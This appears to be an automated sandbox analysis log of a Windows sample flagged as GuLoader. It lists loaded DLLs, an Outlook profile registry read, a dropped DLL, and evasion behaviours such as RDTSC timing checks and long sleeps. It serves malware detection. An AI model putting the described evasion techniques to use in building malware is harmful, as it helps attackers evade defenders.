Source: rFa24c148.exe Virustotal: Detection: 31%
Source: C:\Users\user\Desktop\rFa24c148.exe File read: C:\Users\user\Desktop\rFa24c148.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe"
Source: C:\Users\user\Desktop\rFa24c148.exe Process created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe"
Source: C:\Users\user\Desktop\rFa24c148.exe Process created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe" Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.2061274960.00000000052E5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
Drops PE files
Source: C:\Users\user\Desktop\rFa24c148.exe File created: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\rFa24c148.exe API/Special instruction interceptor: Address: 5AE938D
Source: C:\Users\user\Desktop\rFa24c148.exe API/Special instruction interceptor: Address: 1FA938D
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\rFa24c148.exe RDTSC instruction interceptor: First address: 5AAAA11 second address: 5AAAA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F80C4ECD97Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rFa24c148.exe RDTSC instruction interceptor: First address: 1F6AA11 second address: 1F6AA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F80C48489FAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\rFa24c148.exe Memory allocated: 120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Memory allocated: 33440000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Memory allocated: 33340000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599424 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599174 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599047 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598922 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598812 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598593 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598265 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598047 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597922 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597812 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597703 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597593 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597374 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597265 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597046 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596826 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596593 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596484 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596373 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596265 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596046 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595937 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595718 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595500 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595390 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595281 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595172 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595061 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594843 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594515 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\rFa24c148.exe Window / User API: threadDelayed 8391 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Window / User API: threadDelayed 1458 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\rFa24c148.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\rFa24c148.exe API coverage: 1.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -34126476536362649s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7872 Thread sleep count: 8391 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7872 Thread sleep count: 1458 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599424s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599174s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598593s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597593s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597374s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597046s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596826s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596593s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596373s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596046s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595061s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -594953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -594843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -594734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -594625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -594515s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599424 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599174 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599047 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598922 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598812 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598593 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598265 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598047 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597922 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597812 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597703 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597593 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597374 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597265 Jump to behavior
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597156 Jump to behavior
